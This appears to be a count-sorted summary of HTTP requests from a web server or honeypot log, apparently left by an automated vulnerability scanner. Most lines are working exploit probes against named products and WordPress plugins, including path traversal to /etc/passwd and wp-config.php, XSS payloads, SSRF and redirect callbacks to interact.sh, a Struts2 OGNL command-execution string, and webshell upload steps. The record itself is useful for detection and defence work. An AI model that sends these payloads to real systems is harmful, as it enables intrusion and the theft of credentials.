1 GET /webadmin/ HTTP/1.1
1 GET /webadmin/authportal/bounce.php?url=https[:]//interact[.]sh/ HTTP/1.1
1 GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /webadmin/reporter/view_server_log.php?act=stats&count=1&filename=log&filter=0&log=../../../../../../etc/passwd&offset=1&sortorder=0 HTTP/1.1
1 GET /webadmin/start/ HTTP/1.1
1 GET /webadmin/tools/systemstatus_remote.php HTTP/1.1
1 GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1
1 GET /webclient/Login.xhtml HTTP/1.1
1 GET /weblogin.htm HTTP/1.1
1 GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1
1 GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1
1 GET /webmin/ HTTP/1.1
1 GET /webmodule-ee/login.seam HTTP/1.1
1 GET /webpack.config.js HTTP/1.1
1 GET /webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /webshell4/login.php?err=U&errcode=0&login=\\%22%20onfocus=alert(document.domain)%20autofocus%20\\%22 HTTP/1.1
1 GET /webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /website/lang/en_US?r=https[:]//interact[.]sh/ HTTP/1.1
1 GET /webtools/control/main HTTP/1.1
1 GET /welcome HTTP/1.1
1 GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1
1 GET /wgetrc HTTP/1.1
1 GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wifi_base.shtml HTTP/1.1
1 GET /wiki HTTP/1.1
1 GET /wnm/login/login.json HTTP/1.1
1 GET /wp-admin/admin-ajax.php?_memberhero_hook=phpinfo&action=memberhero_send_form HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=aux_the_recent_products&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E&data[wp_query_args][post_type]=post HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https[:]//interact[.]sh HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=ptp_design4_color_columns&column_names=<script>alert(document.domain)</script>&post_id=1 HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&q=<img%20src%3dx%20onerror%3dalert(document.domain)>&tl=en HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&gallery_current_index=<script>alert(document.domain)</script>&limit=1&start=0 HTTP/1.1
1 GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-admin/admin.php?page=rsvp-admin-export HTTP/1.1
1 GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-admin/install.php HTTP/1.1
1 GET /wp-admin/maint/repair.php HTTP/1.1
1 GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /wp-content/plugins/adminer/adminer.php HTTP/1.1
1 GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
1 GET /wp-content/plugins/avchat-3/index_popup.php?FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
1 GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1
1 GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/count-per-day/download.php?f=/etc/passwd&n=1 HTTP/1.1
1 GET /wp-content/plugins/custom-tables/iframe.php?key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&s=1 HTTP/1.1
1 GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1
1 GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
1 GET /wp-content/plugins/easy-media-gallery-pro/ HTTP/1.1
1 GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1
1 GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1
1 GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1
1 GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1
1 GET /wp-content/plugins/jsmol2wp/php/jsmol.php?call=getRawDataFromDatabase&isform=true&query=php://filter/resource=../../../../wp-config.php HTTP/1.1
1 GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http[:]//a[.]com%27)alert(/2LM9d7fiXLv3Fg8I2leRH23peiI/)marmoset.embed(%27a HTTP/1.1
1 GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http[:]//</script><svg/onload=alert(%272LM9d7fiXLv3Fg8I2leRH23peiI%27)> HTTP/1.1
1 GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1
1 GET /wp-content/plugins/mstore-api/ HTTP/1.1
1 GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
1 GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract[.]sh HTTP/1.1
1 GET /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
1 GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
1 GET /wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1
1 GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1
1 GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1
1 GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1
1 GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1
1 GET /wp-content/plugins/super-forms/ HTTP/1.1
1 GET /wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1
1 GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1
1 GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1
1 GET /wp-content/plugins/wordpress-popup/views/admin/ HTTP/1.1
1 GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
1 GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1
1 GET /wp-content/plugins/wpcargo/includes/2LM9cEo2RmmXuAdtTeXehoiddSj.php HTTP/1.1
1 GET /wp-content/plugins/wpcargo/includes/barcode.php?filepath=2LM9cEo2RmmXuAdtTeXehoiddSj.php&size=1&sizefactor=.090909090909&text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx HTTP/1.1
1 GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1
1 GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/themes/Attitude/go.php?https[:]//interact[.]sh/ HTTP/1.1
1 GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1
1 GET /wp-content/themes/eatery/nav.php?-Menu-=https[:]//interact[.]sh/ HTTP/1.1
1 GET /wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA== HTTP/1.1
1 GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1
1 GET /wp-content/uploads/p3d/2LM9cp9FXjO7wXVWGRrdbogSxcP.php HTTP/1.1
1 GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1
1 GET /wp-json/anycomment/v1/auth/wordpress?redirect=https[:]//interact[.]sh?a=https[:]//interact[.]sh HTTP/1.1
1 GET /wp-json/anycomment/v1/auth/wordpress?redirect=https[:]//interact[.]sh HTTP/1.1
1 GET /wp-json/guppy/v2/load-guppy-users?offset=0&search&userId=1 HTTP/1.1
1 GET /wp-json/rps_result/v1/route/search_student?batch_id=1&department_id=1 HTTP/1.1
1 GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1
1 GET /wp-json/ssa/v1/users HTTP/1.1
1 GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1
1 GET /wp-login.php?login-error=<script>alert(document.domain)</script> HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET /wp/readme.html HTTP/1.1
1 GET /ws2020/ HTTP/1.1
1 GET /ws2021/ HTTP/1.1
1 GET /www.key HTTP/1.1
1 GET /www/delivery/afr.php?\")',10000000)alert(1337)setTimeout('alert(\"&refresh=10000 HTTP/1.1
1 GET /www/delivery/lg.php?dest=http[:]//interact[.]sh HTTP/1.1
1 GET /www/start.html HTTP/1.1
1 GET /x HTTP/1.1
1 GET /xmlpserver/servlet/adfresource?documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini&format=aaaaaaaaaaaaaaa HTTP/1.1
1 GET /xxl-job-admin/toLogin HTTP/1.1
1 GET /zabbix/index_sso.php HTTP/1.1
1 GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1
1 GET /zb_system/login.php HTTP/1.1
1 GET /zdm/login_xdm_uc.jsp HTTP/1.1
1 GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /zenphoto/zp-core/setup/index.php HTTP/1.1
1 GET /zentao/index.php?mode=getconfig HTTP/1.1
1 GET /zipkin/ HTTP/1.1
1 GET /zp-core/setup/index.php HTTP/1.1
1 GET /zp/zp-core/setup/index.php HTTP/1.1
1 GET /~sicom/mgrng/LoginForm.php HTTP/1.1
1 HEAD /.env HTTP/1.1
1 HEAD / HTTP/1.1
2 POST /./RestAPI/LogonCustomization HTTP/1.1
1 POST /0/Authenticate HTTP/1.1
1 POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1
1 POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1
1 POST /MUP/ HTTP/1.1
1 POST /OA_HTML/lcmServiceController.jsp HTTP/1.1
1 POST /Side.php HTTP/1.1
1 POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
1 POST /Upload/upload_file.php?l=test HTTP/1.1
1 POST /WEB_VMS/LEVEL15/ HTTP/1.1
1 POST /_bulk HTTP/1.1
1 POST /_search HTTP/1.1
1 POST /account HTTP/1.1
1 POST /actuator/env HTTP/1.1
1 POST /actuator/gateway/refresh HTTP/1.1
1 POST /admin/ajax.php?action=login HTTP/1.1
1 POST /admin/auth/reset-password HTTP/1.1
2 POST /admin/index.php HTTP/1.1
1 POST /api/agent/tabs/agentData HTTP/1.1
1 POST /api/graphql HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
3 POST /api/login HTTP/1.1
1 POST /api/snapshots HTTP/1.1
1 POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
1 POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1
1 POST /api/v1/user/login HTTP/1.1
1 POST /apisix/batch-requests HTTP/1.1
2 POST /apply_sec.cgi HTTP/1.1
1 POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
1 POST /assets/_core/php/profile.php HTTP/1.1
1 POST /aura HTTP/1.1
1 POST /auth/change HTTP/1.1
1 POST /auth/check HTTP/1.1
1 POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1
1 POST /auth HTTP/1.1
1 POST /axis2-admin/login HTTP/1.1
1 POST /axis2/axis2-admin/login HTTP/1.1
7 POST /boaform/admin/formLogin HTTP/1.1
1 POST /boafrm/formSysCmd HTTP/1.1
1 POST /boardDataWW.php HTTP/1.1
1 POST /bsh.servlet.BshServlet HTTP/1.1
1 POST /casmain.xgi HTTP/1.1
1 POST /ccmadmin/j_security_check HTTP/1.1
1 POST /cgi-bin/.%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/bin/sh HTTP/1.1
1 POST /cgi-bin/file_transfer.cgi HTTP/1.1
3 POST /cgi-bin/login.cgi HTTP/1.1
1 POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
1 POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
1 POST /cgi/login.cgi HTTP/1.1
1 POST /cgi?2 HTTP/1.1
1 POST /cgi?7 HTTP/1.1
1 POST /checkValid HTTP/1.1
2 POST /cobbler_api HTTP/1.1
1 POST /console/css/%25252e%25252e%25252fconsole.portal HTTP/1.1
1 POST /console/images/%25252e%25252e%25252fconsole.portal HTTP/1.1
7 POST /console/j_security_check HTTP/1.1
1 POST /context.json HTTP/1.1
1 POST /dashboard/uploadID.php HTTP/1.1
1 POST /debug.php HTTP/1.1
1 POST /dologin.action HTTP/1.1
1 POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
1 POST /druid/indexer/v1/sampler HTTP/1.1
1 POST /forms/doLogin HTTP/1.1
1 POST /fpui/loginServlet HTTP/1.1
1 POST /functionRouter HTTP/1.1
1 POST /fw.login.php HTTP/1.1
1 POST /geoserver/TestWfsPost HTTP/1.1
1 POST /getcfg.php HTTP/1.1
1 POST /hedwig.cgi HTTP/1.1
1 POST /hms/admin/ HTTP/1.1
1 POST /hms/doctor/ HTTP/1.1
1 POST /http/index.php HTTP/1.1
2 POST /ibmmq/console/j_security_check HTTP/1.1
1 POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
1 POST /incom/modules/uploader/showcase/script.php HTTP/1.1
3 POST /index.php?a=attemptLogin&m=login HTTP/1.1
1 POST /index.php?action=login.index HTTP/1.1
1 POST /index.php?controller=editlieux&option=com_gmapfp&task=upload_image&tmpl=component HTTP/1.1
1 POST /index.php?f=login_save&m=member HTTP/1.1
1 POST /index.php?q=result&searchfor=advancesearch HTTP/1.1
4 POST /index.php HTTP/1.1
1 POST /index/login.cgi HTTP/1.1
1 POST /install/install.php?step=4 HTTP/1.1
1 POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
1 POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
1 POST /ispirit/interface/gateway.php HTTP/1.1
2 POST /j_security_check HTTP/1.1
1 POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
1 POST /lcms/index.php HTTP/1.1
1 POST /lib/crud/userprocess.php HTTP/1.1
1 POST /login.cgi HTTP/1.1
1 POST /login.html HTTP/1.1
4 POST /login.php HTTP/1.1
1 POST /login/system HTTP/1.1
1 POST /login/userverify.cgi HTTP/1.1
1 POST /login HTTP/1.1
1 POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1
1 POST /main.ehp HTTP/1.1
2 POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1
1 POST /maint/index.php?packages HTTP/1.1
1 POST /meaweb/os/mxperson HTTP/1.1
3 POST /module/ HTTP/1.1
1 POST /node/1?_format=hal_json HTTP/1.1
4 POST /oauth/token HTTP/1.1
1 POST /onvif/device_service HTTP/1.1
1 POST /opensis/index.php HTTP/1.1
1 POST /orders/3 HTTP/1.1
1 POST /pandora_console/index.php?login=1 HTTP/1.1
1 POST /pandora_console/index.php?pure=0&sec=netf&sec2=operation/netflow/nf_live_view HTTP/1.1
1 POST /pcidss/report?set=1&sid=loginchallengeresponse1requestbody&type=allprofiles&username=nsroot HTTP/1.1
1 POST /php/demo.php HTTP/1.1
1 POST /php/login.php HTTP/1.1
1 POST /php/movefile.php?f=%2Fapp%2FUploads%2F2LM9cA7GW9JWuK0j75pcxio7P7R.jpg&n=%2Fapp%2FUploads%2F2LM9cA7GW9JWuK0j75pcxio7P7R.php HTTP/1.1
1 POST /php/ping.php HTTP/1.1
1 POST /php/renamefile.php?f=%2Fapp%2FUploads%2F2LM9cA7GW9JWuK0j75pcxio7P7R.jpg&n=2LM9cA7GW9JWuK0j75pcxio7P7R.php HTTP/1.1
1 POST /php/upload.php HTTP/1.1
1 POST /plugin/add HTTP/1.1
1 POST /plugin/customMethod HTTP/1.1
1 POST /rails/actions?action=Run%20pending%20migrations&error=ActiveRecord::PendingMigrationError&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1
1 POST /royal_event/companyprofile.php HTTP/1.1
2 POST /run HTTP/1.1
1 POST /s/aura HTTP/1.1
1 POST /s/fact HTTP/1.1
1 POST /search/ HTTP/1.1
1 POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
1 POST /server/index.php?s=/api/user/login HTTP/1.1
1 POST /service.web HTTP/1.1
1 POST /service/rapture/session HTTP/1.1
1 POST /servlet/UploadServlet HTTP/1.1
1 POST /session/create HTTP/1.1
1 POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
1 POST /struts2-rest-showcase/orders/3 HTTP/1.1
1 POST /ui/api/v1/ui/auth/login HTTP/1.1
2 POST /upload HTTP/1.1
1 POST /user.action HTTP/1.1
1 POST /user/login/login HTTP/1.1
1 POST /userpost/xerox.set HTTP/1.1
1 POST /v2/query HTTP/1.1
1 POST /var HTTP/1.1
1 POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1
1 POST /versa/login HTTP/1.1
1 POST /webadm/?action=gragh&q=moni_detail.do HTTP/1.1
1 POST /webadmin/auth/verification.php HTTP/1.1
1 POST /webapi/auth HTTP/1.1
1 POST /webmail/basic/ HTTP/1.1
1 POST /webtools/control/xmlrpc HTTP/1.1
2 POST /wls-wsat/CoordinatorPortType HTTP/1.1
1 POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/1.1
1 POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1
4 POST /wp-admin/admin-ajax.php HTTP/1.1
1 POST /wp-admin/admin.php?page=vfb-export HTTP/1.1
1 POST /wp-admin/admin.php HTTP/1.1
1 POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
1 POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1
1 POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
1 POST /wp-content/plugins/wpcargo/includes/2LM9cEo2RmmXuAdtTeXehoiddSj.php?1=var_dump HTTP/1.1
3 POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
1 POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1
1 POST /wp-json/visualizer/v1/upload-data HTTP/1.1
1 POST /wp-login.php?wlcms-action=preview HTTP/1.1
1 POST /ws_utc/resources/setting/options HTTP/1.1
2 POST /xmlrpc.php HTTP/1.1
1 POST /xmlrpc/pingback HTTP/1.1
2 PRI * HTTP/2.0
1 PUT /SDK/webLanguage HTTP/1.1
1 PUT /meta HTTP/1.1
1 PUT /poc.jsp/ HTTP/1.1
1 PUT /testing-put.txt HTTP/1.1
1 PUT /v1/kv/2LM9cmXyUrCp73Dwo82obNyArD4 HTTP/1.1